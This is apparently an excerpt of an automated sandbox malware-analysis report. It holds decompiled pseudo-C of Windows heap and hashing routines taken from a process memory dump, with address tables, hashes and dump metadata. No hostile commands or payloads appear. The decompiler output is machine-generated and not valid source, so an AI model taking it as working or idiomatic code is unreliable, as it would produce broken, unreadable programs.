                                                                            								}
                                                                            							}
                                                                            							L15:
                                                                            							_t146 = 0x7ffe0380;
                                                                            							goto L16;
                                                                            						}
                                                                            						_t271 =  *_t215;
                                                                            						if(_t271 != 0) {
                                                                            							L63:
                                                                            							_t101 = _t298 - 8; // -8
                                                                            							_t232 = _t101;
                                                                            							__eflags = _v28 +  *_t276 - _t271;
                                                                            							if(__eflags <= 0) {
                                                                            								goto L11;
                                                                            							}
                                                                            							_t220 =  *(_v24 + 4);
                                                                            							__eflags =  *(_v24 + 4);
                                                                            							if(__eflags != 0) {
                                                                            								E1D895FED(0x15, _t300, 0, _t220, _v32, _v28);
                                                                            								_t276 = _v8;
                                                                            							}
                                                                            							_t143 = 0xc000012d;
                                                                            							goto L12;
                                                                            						}
                                                                            						_t271 =  *0x1d8c432c; // 0x0
                                                                            						_v24 = 0x1d8c432c;
                                                                            						if(_t271 != 0) {
                                                                            							goto L63;
                                                                            						}
                                                                            						goto L11;
                                                                            					}
                                                                            				}
                                                                            			}

                                                                            0x1d7e08a2
                                                                            0x1d7e08a5
                                                                            0x1d835079
                                                                            0x1d83507f
                                                                            0x1d835086
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d835091
                                                                            0x1d835093
                                                                            0x1d8350a5
                                                                            0x1d835095
                                                                            0x1d83509e
                                                                            0x1d83509e
                                                                            0x1d8350af
                                                                            0x1d8350be
                                                                            0x1d7e08ae
                                                                            0x1d7e08b4
                                                                            0x1d7e08b9
                                                                            0x1d8350c8
                                                                            0x1d8350cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8350da
                                                                            0x1d7e08c4
                                                                            0x1d7e08c7
                                                                            0x1d8350e9
                                                                            0x1d8350eb
                                                                            0x1d8350fd
                                                                            0x1d8350ed
                                                                            0x1d8350f6
                                                                            0x1d8350f6
                                                                            0x1d835113
                                                                            0x1d835113
                                                                            0x00000000
                                                                            0x1d7e08cd
                                                                            0x1d7e08bf
                                                                            0x1d7e08bf
                                                                            0x00000000
                                                                            0x1d7e08bf
                                                                            0x1d7e08ab
                                                                            0x1d7e08ab
                                                                            0x00000000
                                                                            0x1d7e08ab
                                                                            0x1d7e089d
                                                                            0x1d7e089d
                                                                            0x00000000
                                                                            0x1d7e089d
                                                                            0x1d7e07f0
                                                                            0x1d7e07f0
                                                                            0x1d7e07f8
                                                                            0x1d835014
                                                                            0x1d835017
                                                                            0x1d83501a
                                                                            0x1d835036
                                                                            0x1d83503d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83501c
                                                                            0x1d83501c
                                                                            0x1d83501c
                                                                            0x1d83501e
                                                                            0x1d835020
                                                                            0x1d835023
                                                                            0x1d835026
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d835028
                                                                            0x1d83502b
                                                                            0x1d83502e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d835030
                                                                            0x1d835035
                                                                            0x1d835035
                                                                            0x00000000
                                                                            0x1d835035
                                                                            0x1d7e07fe
                                                                            0x1d7e07fe
                                                                            0x1d7e0801
                                                                            0x1d7e0803
                                                                            0x1d7e0808
                                                                            0x1d835053
                                                                            0x1d7e0816
                                                                            0x1d7e0816
                                                                            0x1d7e0818
                                                                            0x1d7e0818
                                                                            0x00000000
                                                                            0x1d7e0808
                                                                            0x1d7e07ee
                                                                            0x1d7e0789
                                                                            0x1d7e0789
                                                                            0x00000000
                                                                            0x1d7e0789
                                                                            0x1d7e0732
                                                                            0x1d7e0736
                                                                            0x1d834f63
                                                                            0x1d834f66
                                                                            0x1d834f66
                                                                            0x1d834f6b
                                                                            0x1d834f6d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d834f76
                                                                            0x1d834f79
                                                                            0x1d834f7b
                                                                            0x1d834f8d
                                                                            0x1d834f92
                                                                            0x1d834f92
                                                                            0x1d834f95
                                                                            0x00000000
                                                                            0x1d834f95
                                                                            0x1d7e073c
                                                                            0x1d7e0742
                                                                            0x1d7e074b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7e074b
                                                                            0x1d7e06ff

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-4253913091
                                                                            • Opcode ID: e90800ea2e9e36bf3f883aa1cbe91ccde98aad9e9341d1431512391ca52ad51a
                                                                            • Instruction ID: 48195aa13d24bff9f764bc199e7eea7cb9f79928e2f0a4add7c11883ea3e935f
                                                                            • Opcode Fuzzy Hash: e90800ea2e9e36bf3f883aa1cbe91ccde98aad9e9341d1431512391ca52ad51a
                                                                            • Instruction Fuzzy Hash: D6F1FD74A00656EFDB06CF68C894B6AB7B5FF84750F1081A9E5099B391D730F981CFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 45%
                                                                            			E1D8AACEB(signed int __ecx, signed int* __edx) {
                                                                            				signed int _v8;
                                                                            				signed int* _v12;
                                                                            				signed char _v13;
                                                                            				signed char _v14;
                                                                            				signed char _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v21;
                                                                            				signed int _v22;
                                                                            				signed char _v24;
                                                                            				signed char _v25;
                                                                            				signed char _v26;
                                                                            				signed int _v28;
                                                                            				signed int _v32;
                                                                            				intOrPtr _v36;
                                                                            				signed int _v40;
                                                                            				signed int* _t146;
                                                                            				signed int _t149;
                                                                            				signed int _t151;
                                                                            				signed int _t167;
                                                                            				signed int _t169;
                                                                            				signed int _t173;
                                                                            				signed char _t176;
                                                                            				signed int _t195;
                                                                            				void* _t211;
                                                                            				signed int _t250;
                                                                            				signed int _t251;
                                                                            				signed int _t253;
                                                                            				intOrPtr* _t254;
                                                                            				signed int _t261;
                                                                            				signed char _t267;
                                                                            				signed char _t274;
                                                                            				intOrPtr _t283;
                                                                            				signed int _t285;
                                                                            				signed int _t288;
                                                                            				signed int _t292;
                                                                            				intOrPtr _t295;
                                                                            				signed int _t297;
                                                                            				signed int* _t304;
                                                                            				signed char _t305;
                                                                            				void* _t333;
                                                                            				unsigned int _t335;
                                                                            				signed int _t336;
                                                                            				signed char _t337;
                                                                            				unsigned int _t338;
                                                                            				signed int _t339;
                                                                            				signed int _t343;
                                                                            				signed int _t345;
                                                                            				intOrPtr _t349;
                                                                            				signed char _t351;
                                                                            				signed int _t353;
                                                                            				signed char _t354;
                                                                            				unsigned int _t355;
                                                                            				unsigned int _t356;
                                                                            				signed int _t358;
                                                                            				unsigned int _t360;
                                                                            				void* _t361;
                                                                            				signed int _t362;
                                                                            				signed int _t364;
                                                                            				intOrPtr* _t365;
                                                                            				signed int _t366;
                                                                            				signed int _t367;
                                                                            				void* _t368;
                                                                            				void* _t369;
                                                                            				void* _t370;
                                                                            				void* _t371;
                                                                            				void* _t372;
                                                                            				signed char* _t374;
                                                                            				signed int _t375;
                                                                            				signed int _t377;
                                                                            				signed int _t378;
                                                                            				signed int _t380;
                                                                            				signed char _t381;
                                                                            				unsigned int _t383;
                                                                            
                                                                            				_t146 = __edx;
                                                                            				_v8 = __ecx;
                                                                            				_v12 = __edx;
                                                                            				_t251 = 0x4cb2f;
                                                                            				_t3 = _t146 + 4; // 0x8b0775c0
                                                                            				_t374 =  *_t3;
                                                                            				_t360 =  *__edx << 2;
                                                                            				if(_t360 < 8) {
                                                                            					L3:
                                                                            					_t361 = _t360 - 1;
                                                                            					if(_t361 == 0) {
                                                                            						L16:
                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                            						L17:
                                                                            						_t375 = _v8;
                                                                            						_t12 = _t375 + 0x1c; // 0x1d8aabd2
                                                                            						_v24 = _t12;
                                                                            						_t149 = L1D7D53C0(_t12);
                                                                            						_t362 = 0;
                                                                            						while(1) {
                                                                            							L18:
                                                                            							_t14 = _t375 + 4; // 0x8bf8558b
                                                                            							_t335 =  *_t14;
                                                                            							_t151 = (_t149 | 0xffffffff) << (_t335 & 0x0000001f);
                                                                            							_t267 = _t251 & _t151;
                                                                            							_v28 = _t151;
                                                                            							_v20 = _t267;
                                                                            							_v16 = _t267;
                                                                            							if(_t362 != 0) {
                                                                            								goto L21;
                                                                            							}
                                                                            							_t356 = _t335 >> 5;
                                                                            							if(_t356 == 0) {
                                                                            								_t362 = 0;
                                                                            								L30:
                                                                            								if(_t362 == 0) {
                                                                            									L34:
                                                                            									_t33 = _t375 + 0x1c; // 0x1d8aabd2
                                                                            									E1D7D52F0(_t267, _t33);
                                                                            									_t35 = _t375 + 0x28; // 0x8b0a74f6
                                                                            									_t36 = _t375 + 0x20; // 0x8bb372c7
                                                                            									 *0x1d8c91e0(0xc +  *_v12 * 4,  *_t35);
                                                                            									_t337 =  *((intOrPtr*)( *_t36))();
                                                                            									_v16 = _t337;
                                                                            									if(_t337 != 0) {
                                                                            										asm("stosd");
                                                                            										asm("stosd");
                                                                            										asm("stosd");
                                                                            										 *(_t337 + 8) =  *(_t337 + 8) & 0xff000001 | 0x00000001;
                                                                            										 *((char*)(_t337 + 0xb)) =  *_v12;
                                                                            										 *(_t337 + 4) = _t251;
                                                                            										_t46 = _t337 + 0xc; // 0xc
                                                                            										_t167 = L1D7E2330(E1D8188C0(_t46, _v12[1],  *_v12 << 2), _v24);
                                                                            										_t377 = _v8;
                                                                            										_t364 = 0;
                                                                            										do {
                                                                            											_t49 = _t377 + 4; // 0x8bf8558b
                                                                            											_t338 =  *_t49;
                                                                            											_t169 = (_t167 | 0xffffffff) << (_t338 & 0x0000001f);
                                                                            											_v28 = _t169;
                                                                            											_t274 = _t169 & _t251;
                                                                            											_v20 = _t274;
                                                                            											_v24 = _t274;
                                                                            											if(_t364 != 0) {
                                                                            												L40:
                                                                            												_t339 = _v28;
                                                                            												while(1) {
                                                                            													_t364 =  *_t364;
                                                                            													if((_t364 & 0x00000001) != 0) {
                                                                            														break;
                                                                            													}
                                                                            													if(_t274 == ( *(_t364 + 4) & _t339)) {
                                                                            														L45:
                                                                            														if(_t364 == 0) {
                                                                            															L52:
                                                                            															_t253 = _t377;
                                                                            															_t68 = _t253 + 0x28; // 0x8b0a74f6
                                                                            															_t69 = _t253 + 4; // 0x8bf8558b
                                                                            															_t378 =  *_t69;
                                                                            															_t70 = _t253 + 0x20; // 0x8bb372c7
                                                                            															_t365 =  *_t70;
                                                                            															_v28 =  *_t68;
                                                                            															_t72 = _t253 + 0x24; // 0x85f633fe
                                                                            															_v40 =  *_t72;
                                                                            															_t173 = _t378 >> 5;
                                                                            															if( *_t253 < _t173 + _t173) {
                                                                            																L73:
                                                                            																_t380 = _v16;
                                                                            																_t364 = _t380;
                                                                            																_t176 = (_t173 | 0xffffffff) << (_t378 & 0x0000001f) &  *(_t380 + 4);
                                                                            																_v40 = _t176;
                                                                            																_v28 = _t176;
                                                                            																_t343 = (_t378 >> 0x00000005) - 0x00000001 & ((((_t176 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_v40 & 0x000000ff)) * 0x00000025 + (_v26 & 0x000000ff)) * 0x00000025 + (_v25 & 0x000000ff);
                                                                            																_t136 = _t253 + 8; // 0xc183f44d
                                                                            																_t283 =  *_t136;
                                                                            																 *_t380 =  *(_t283 + _t343 * 4);
                                                                            																 *(_t283 + _t343 * 4) = _t380;
                                                                            																 *_t253 =  *_t253 + 1;
                                                                            																_t381 = 0;
                                                                            																L74:
                                                                            																_t141 = _t253 + 0x1c; // 0x1d8aabd2
                                                                            																E1D7E24D0(_t141);
                                                                            																if(_t381 != 0) {
                                                                            																	_t142 = _t253 + 0x28; // 0x8b0a74f6
                                                                            																	_t143 = _t253 + 0x24; // 0x85f633fe
                                                                            																	 *0x1d8c91e0(_t381,  *_t142);
                                                                            																	 *((intOrPtr*)( *_t143))();
                                                                            																}
                                                                            																L76:
                                                                            																return _t364;
                                                                            															}
                                                                            															_t285 = 2;
                                                                            															_t173 = E1D804CF8( &_v24, _t173 * _t285, _t173 * _t285 >> 0x20);
                                                                            															if(_t173 < 0) {
                                                                            																goto L73;
                                                                            															}
                                                                            															_t383 = _v24;
                                                                            															if(_t383 < 4) {
                                                                            																_t383 = 4;
                                                                            															}
                                                                            															 *0x1d8c91e0(_t383 << 2, _v28);
                                                                            															_t173 =  *_t365();
                                                                            															_t345 = _t173;
                                                                            															_v12 = _t345;
                                                                            															if(_t345 == 0) {
                                                                            																_t144 = _t253 + 4; // 0x8bf8558b
                                                                            																_t378 =  *_t144;
                                                                            																if(_t378 >= 0x20) {
                                                                            																	goto L73;
                                                                            																}
                                                                            																_t381 = _v16;
                                                                            																_t364 = 0;
                                                                            																goto L74;
                                                                            															} else {
                                                                            																_t83 = _t383 - 1; // 0x3
                                                                            																_t288 = _t83;
                                                                            																if((_t383 & _t288) == 0) {
                                                                            																	L61:
                                                                            																	if(_t383 > 0x4000000) {
                                                                            																		_t383 = 0x4000000;
                                                                            																	}
                                                                            																	_t366 = _t345;
                                                                            																	_v24 = _v24 & 0x00000000;
                                                                            																	_t195 = _t253 | 0x00000001;
                                                                            																	asm("sbb ecx, ecx");
                                                                            																	_t292 =  !( &(_v12[_t383])) & _t383 << 0x00000002 >> 0x00000002;
                                                                            																	if(_t292 <= 0) {
                                                                            																		L66:
                                                                            																		_t92 = _t253 + 4; // 0x8bf8558b
                                                                            																		_t367 = 0;
                                                                            																		_v32 = (_t195 | 0xffffffff) << ( *_t92 & 0x0000001f);
                                                                            																		if(( *(_t253 + 4) & 0xffffffe0) <= 0) {
                                                                            																			L71:
                                                                            																			_t121 = _t253 + 8; // 0xc183f44d
                                                                            																			_t295 =  *_t121;
                                                                            																			 *((intOrPtr*)(_t253 + 8)) = _v12;
                                                                            																			_t124 = _t253 + 4; // 0x8bf8558b
                                                                            																			_t173 =  *_t124 & 0x0000001f;
                                                                            																			_t378 = _t383 << 0x00000005 | _t173;
                                                                            																			 *(_t253 + 4) = _t378;
                                                                            																			if(_t295 != 0) {
                                                                            																				 *0x1d8c91e0(_t295, _v28);
                                                                            																				_t173 =  *_v40();
                                                                            																				_t128 = _t253 + 4; // 0x8bf8558b
                                                                            																				_t378 =  *_t128;
                                                                            																			}
                                                                            																			goto L73;
                                                                            																		} else {
                                                                            																			goto L67;
                                                                            																		}
                                                                            																		do {
                                                                            																			L67:
                                                                            																			_t97 = _t253 + 8; // 0xc183f44d
                                                                            																			_t349 =  *_t97;
                                                                            																			_v36 = _t349;
                                                                            																			while(1) {
                                                                            																				_t297 =  *(_t349 + _t367 * 4);
                                                                            																				_v20 = _t297;
                                                                            																				if((_t297 & 0x00000001) != 0) {
                                                                            																					goto L70;
                                                                            																				}
                                                                            																				 *(_t349 + _t367 * 4) =  *_t297;
                                                                            																				_t351 =  *(_t297 + 4) & _v32;
                                                                            																				_t254 = _v20;
                                                                            																				_v24 = _t351;
                                                                            																				_t353 = _t383 - 0x00000001 & ((((_t351 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_t351 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025 + (_v21 & 0x000000ff);
                                                                            																				_t304 = _v12;
                                                                            																				 *_t254 =  *((intOrPtr*)(_t304 + _t353 * 4));
                                                                            																				 *((intOrPtr*)(_t304 + _t353 * 4)) = _t254;
                                                                            																				_t349 = _v36;
                                                                            																			}
                                                                            																			L70:
                                                                            																			_t253 = _v8;
                                                                            																			_t367 = _t367 + 1;
                                                                            																			_t120 = _t253 + 4; // 0x8bf8558b
                                                                            																		} while (_t367 <  *_t120 >> 5);
                                                                            																		goto L71;
                                                                            																	} else {
                                                                            																		_t354 = _v24;
                                                                            																		do {
                                                                            																			_t354 = _t354 + 1;
                                                                            																			 *_t366 = _t195;
                                                                            																			_t366 = _t366 + 4;
                                                                            																		} while (_t354 < _t292);
                                                                            																		goto L66;
                                                                            																	}
                                                                            																}
                                                                            																_t305 = _t288 | 0xffffffff;
                                                                            																if(_t383 == 0) {
                                                                            																	L60:
                                                                            																	_t383 = 1 << _t305;
                                                                            																	goto L61;
                                                                            																} else {
                                                                            																	goto L59;
                                                                            																}
                                                                            																do {
                                                                            																	L59:
                                                                            																	_t305 = _t305 + 1;
                                                                            																	_t383 = _t383 >> 1;
                                                                            																} while (_t383 != 0);
                                                                            																goto L60;
                                                                            															}
                                                                            														}
                                                                            														goto L46;
                                                                            													}
                                                                            												}
                                                                            												_t364 = 0;
                                                                            												goto L45;
                                                                            											}
                                                                            											_t355 = _t338 >> 5;
                                                                            											if(_t355 == 0) {
                                                                            												_t364 = 0;
                                                                            												L49:
                                                                            												if(_t364 == 0) {
                                                                            													goto L52;
                                                                            												}
                                                                            												_t66 = _t364 + 8; // 0x8
                                                                            												_t211 = E1D8AAC6F(_t66);
                                                                            												_t253 = _t377;
                                                                            												_t381 = _v16;
                                                                            												if(_t211 == 0) {
                                                                            													_t364 = 0;
                                                                            												}
                                                                            												goto L74;
                                                                            											}
                                                                            											_t56 = _t355 - 1; // 0x8bf8558a
                                                                            											_t57 = _t377 + 8; // 0xc183f44d
                                                                            											_t364 =  *_t57 + (_t56 & (_v21 & 0x000000ff) + 0x164b2f3f + (((_t274 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025) * 4;
                                                                            											_t274 = _v20;
                                                                            											goto L40;
                                                                            											L46:
                                                                            											_t167 = E1D8AACB2(_t364, _v12);
                                                                            										} while (_t167 == 0);
                                                                            										goto L49;
                                                                            									}
                                                                            									_t364 = 0;
                                                                            									goto L76;
                                                                            								}
                                                                            								_t31 = _t362 + 8; // 0x8
                                                                            								_t314 = _t31;
                                                                            								if(E1D8AAC6F(_t31) == 0) {
                                                                            									_t364 = 0;
                                                                            								}
                                                                            								E1D7D52F0(_t314, _v24);
                                                                            								goto L76;
                                                                            							}
                                                                            							_t21 = _t356 - 1; // 0x8bf8558a
                                                                            							_t22 = _t375 + 8; // 0xc183f44d
                                                                            							_t362 =  *_t22 + (_t21 & (_v13 & 0x000000ff) + 0x164b2f3f + (((_t267 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v14 & 0x000000ff)) * 0x00000025) * 4;
                                                                            							_t267 = _v20;
                                                                            							L21:
                                                                            							_t336 = _v28;
                                                                            							while(1) {
                                                                            								_t362 =  *_t362;
                                                                            								if((_t362 & 0x00000001) != 0) {
                                                                            									break;
                                                                            								}
                                                                            								if(_t267 == ( *(_t362 + 4) & _t336)) {
                                                                            									L26:
                                                                            									if(_t362 == 0) {
                                                                            										goto L34;
                                                                            									}
                                                                            									_t149 = E1D8AACB2(_t362, _v12);
                                                                            									if(_t149 != 0) {
                                                                            										goto L30;
                                                                            									}
                                                                            									goto L18;
                                                                            								}
                                                                            							}
                                                                            							_t362 = 0;
                                                                            							goto L26;
                                                                            						}
                                                                            					}
                                                                            					_t368 = _t361 - 1;
                                                                            					if(_t368 == 0) {
                                                                            						L15:
                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                            						_t374 =  &(_t374[1]);
                                                                            						goto L16;
                                                                            					}
                                                                            					_t369 = _t368 - 1;
                                                                            					if(_t369 == 0) {
                                                                            						L14:
                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                            						_t374 =  &(_t374[1]);
                                                                            						goto L15;
                                                                            					}
                                                                            					_t370 = _t369 - 1;
                                                                            					if(_t370 == 0) {
                                                                            						L13:
                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                            						_t374 =  &(_t374[1]);
                                                                            						goto L14;
                                                                            					}
                                                                            					_t371 = _t370 - 1;
                                                                            					if(_t371 == 0) {
                                                                            						L12:
                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                            						_t374 =  &(_t374[1]);
                                                                            						goto L13;
                                                                            					}
                                                                            					_t372 = _t371 - 1;
                                                                            					if(_t372 == 0) {
                                                                            						L11:
                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                            						_t374 =  &(_t374[1]);
                                                                            						goto L12;
                                                                            					}
                                                                            					if(_t372 != 1) {
                                                                            						goto L17;
                                                                            					} else {
                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                            						_t374 =  &(_t374[1]);
                                                                            						goto L11;
                                                                            					}
                                                                            				} else {
                                                                            					_t358 = _t360 >> 3;
                                                                            					_t360 = _t360 + _t358 * 0xfffffff8;
                                                                            					do {
                                                                            						_t333 = ((((((_t374[1] & 0x000000ff) * 0x25 + (_t374[2] & 0x000000ff)) * 0x25 + (_t374[3] & 0x000000ff)) * 0x25 + (_t374[4] & 0x000000ff)) * 0x25 + (_t374[5] & 0x000000ff)) * 0x25 + (_t374[6] & 0x000000ff)) * 0x25 - _t251 * 0x2fe8ed1f;
                                                                            						_t261 = ( *_t374 & 0x000000ff) * 0x1a617d0d;
                                                                            						_t250 = _t374[7] & 0x000000ff;
                                                                            						_t374 =  &(_t374[8]);
                                                                            						_t251 = _t261 + _t333 + _t250;
                                                                            						_t358 = _t358 - 1;
                                                                            					} while (_t358 != 0);
                                                                            					goto L3;
                                                                            				}
                                                                            			}
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8aaf6f
                                                                            0x1d8aaf75
                                                                            0x1d8aaf77
                                                                            0x1d8aafae
                                                                            0x1d8aafae
                                                                            0x1d8aafb0
                                                                            0x1d8aafb3
                                                                            0x1d8aafb3
                                                                            0x1d8aafb6
                                                                            0x1d8aafb6
                                                                            0x1d8aafb9
                                                                            0x1d8aafbc
                                                                            0x1d8aafbf
                                                                            0x1d8aafc4
                                                                            0x1d8aafcc
                                                                            0x1d8ab11b
                                                                            0x1d8ab128
                                                                            0x1d8ab12d
                                                                            0x1d8ab12f
                                                                            0x1d8ab132
                                                                            0x1d8ab135
                                                                            0x1d8ab15e
                                                                            0x1d8ab160
                                                                            0x1d8ab160
                                                                            0x1d8ab166
                                                                            0x1d8ab168
                                                                            0x1d8ab16b
                                                                            0x1d8ab16d
                                                                            0x1d8ab16f
                                                                            0x1d8ab16f
                                                                            0x1d8ab173
                                                                            0x1d8ab17a
                                                                            0x1d8ab17c
                                                                            0x1d8ab180
                                                                            0x1d8ab185
                                                                            0x1d8ab18b
                                                                            0x1d8ab18b
                                                                            0x1d8ab18d
                                                                            0x1d8ab193
                                                                            0x1d8ab193
                                                                            0x1d8aafd4
                                                                            0x1d8aafdc
                                                                            0x1d8aafe3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8aafe9
                                                                            0x1d8aafef
                                                                            0x1d8aaff3
                                                                            0x1d8aaff3
                                                                            0x1d8aafff
                                                                            0x1d8ab005
                                                                            0x1d8ab007
                                                                            0x1d8ab009
                                                                            0x1d8ab00e
                                                                            0x1d8ab194
                                                                            0x1d8ab194
                                                                            0x1d8ab19a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8ab1a0
                                                                            0x1d8ab1a3
                                                                            0x00000000
                                                                            0x1d8ab014
                                                                            0x1d8ab014
                                                                            0x1d8ab014
                                                                            0x1d8ab019
                                                                            0x1d8ab02c
                                                                            0x1d8ab033
                                                                            0x1d8ab035
                                                                            0x1d8ab035
                                                                            0x1d8ab03a
                                                                            0x1d8ab03c
                                                                            0x1d8ab049
                                                                            0x1d8ab052
                                                                            0x1d8ab056
                                                                            0x1d8ab058
                                                                            0x1d8ab067
                                                                            0x1d8ab067
                                                                            0x1d8ab070
                                                                            0x1d8ab07b
                                                                            0x1d8ab07e
                                                                            0x1d8ab0ec
                                                                            0x1d8ab0ec
                                                                            0x1d8ab0ec
                                                                            0x1d8ab0f2
                                                                            0x1d8ab0f5
                                                                            0x1d8ab0fb
                                                                            0x1d8ab0fe
                                                                            0x1d8ab100
                                                                            0x1d8ab105
                                                                            0x1d8ab110
                                                                            0x1d8ab116
                                                                            0x1d8ab118
                                                                            0x1d8ab118
                                                                            0x1d8ab118
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8ab080
                                                                            0x1d8ab080
                                                                            0x1d8ab080
                                                                            0x1d8ab080
                                                                            0x1d8ab083
                                                                            0x1d8ab086
                                                                            0x1d8ab086
                                                                            0x1d8ab089
                                                                            0x1d8ab092
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8ab096
                                                                            0x1d8ab09c
                                                                            0x1d8ab0a7
                                                                            0x1d8ab0b0
                                                                            0x1d8ab0ca
                                                                            0x1d8ab0cc
                                                                            0x1d8ab0d2
                                                                            0x1d8ab0d6
                                                                            0x1d8ab0d9
                                                                            0x1d8ab0d9
                                                                            0x1d8ab0de
                                                                            0x1d8ab0de
                                                                            0x1d8ab0e1
                                                                            0x1d8ab0e2
                                                                            0x1d8ab0e8
                                                                            0x00000000
                                                                            0x1d8ab05a
                                                                            0x1d8ab05a
                                                                            0x1d8ab05d
                                                                            0x1d8ab05d
                                                                            0x1d8ab05e
                                                                            0x1d8ab060
                                                                            0x1d8ab063
                                                                            0x00000000
                                                                            0x1d8ab05d
                                                                            0x1d8ab058
                                                                            0x1d8ab01b
                                                                            0x1d8ab020
                                                                            0x1d8ab027
                                                                            0x1d8ab02a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8ab022
                                                                            0x1d8ab022
                                                                            0x1d8ab022
                                                                            0x1d8ab023
                                                                            0x1d8ab023
                                                                            0x00000000
                                                                            0x1d8ab022
                                                                            0x1d8ab00e
                                                                            0x00000000
                                                                            0x1d8aaf77
                                                                            0x1d8aaf71
                                                                            0x1d8aaf73
                                                                            0x00000000
                                                                            0x1d8aaf73
                                                                            0x1d8aaf21
                                                                            0x1d8aaf26
                                                                            0x1d8aaf8c
                                                                            0x1d8aaf8e
                                                                            0x1d8aaf90
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8aaf92
                                                                            0x1d8aaf95
                                                                            0x1d8aaf9a
                                                                            0x1d8aaf9c
                                                                            0x1d8aafa1
                                                                            0x1d8aafa7
                                                                            0x1d8aafa7
                                                                            0x00000000
                                                                            0x1d8aafa1
                                                                            0x1d8aaf4d
                                                                            0x1d8aaf52
                                                                            0x1d8aaf55
                                                                            0x1d8aaf58
                                                                            0x00000000
                                                                            0x1d8aaf79
                                                                            0x1d8aaf7d
                                                                            0x1d8aaf82
                                                                            0x00000000
                                                                            0x1d8aaf8a
                                                                            0x1d8aaeba
                                                                            0x00000000
                                                                            0x1d8aaeba
                                                                            0x1d8aae6f
                                                                            0x1d8aae6f
                                                                            0x1d8aae79
                                                                            0x1d8aae7b
                                                                            0x1d8aae7b
                                                                            0x1d8aae81
                                                                            0x00000000
                                                                            0x1d8aae81
                                                                            0x1d8aae2b
                                                                            0x1d8aae30
                                                                            0x1d8aae33
                                                                            0x1d8aae36
                                                                            0x1d8aae39
                                                                            0x1d8aae39
                                                                            0x1d8aae3c
                                                                            0x1d8aae3c
                                                                            0x1d8aae44
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8aae4d
                                                                            0x1d8aae53
                                                                            0x1d8aae55
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8aae5b
                                                                            0x1d8aae62
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8aae64
                                                                            0x1d8aae4f
                                                                            0x1d8aae51
                                                                            0x00000000
                                                                            0x1d8aae51
                                                                            0x1d8aade1
                                                                            0x1d8aad74
                                                                            0x1d8aad77
                                                                            0x1d8aadbf
                                                                            0x1d8aadc5
                                                                            0x1d8aadc7
                                                                            0x00000000
                                                                            0x1d8aadc7
                                                                            0x1d8aad79
                                                                            0x1d8aad7c
                                                                            0x1d8aadb6
                                                                            0x1d8aadbc
                                                                            0x1d8aadbe
                                                                            0x00000000
                                                                            0x1d8aadbe
                                                                            0x1d8aad7e
                                                                            0x1d8aad81
                                                                            0x1d8aadad
                                                                            0x1d8aadb3
                                                                            0x1d8aadb5
                                                                            0x00000000
                                                                            0x1d8aadb5
                                                                            0x1d8aad83
                                                                            0x1d8aad86
                                                                            0x1d8aada4
                                                                            0x1d8aadaa
                                                                            0x1d8aadac
                                                                            0x00000000
                                                                            0x1d8aadac
                                                                            0x1d8aad88
                                                                            0x1d8aad8b
                                                                            0x1d8aad9b
                                                                            0x1d8aada1
                                                                            0x1d8aada3
                                                                            0x00000000
                                                                            0x1d8aada3
                                                                            0x1d8aad90
                                                                            0x00000000
                                                                            0x1d8aad92
                                                                            0x1d8aad98
                                                                            0x1d8aad9a
                                                                            0x00000000
                                                                            0x1d8aad9a
                                                                            0x1d8aad10
                                                                            0x1d8aad12
                                                                            0x1d8aad18
                                                                            0x1d8aad1a
                                                                            0x1d8aad54
                                                                            0x1d8aad59
                                                                            0x1d8aad5f
                                                                            0x1d8aad63
                                                                            0x1d8aad68
                                                                            0x1d8aad6a
                                                                            0x1d8aad6a
                                                                            0x00000000
                                                                            0x1d8aad1a

                                                                            APIs
                                                                            Memory Dump Source
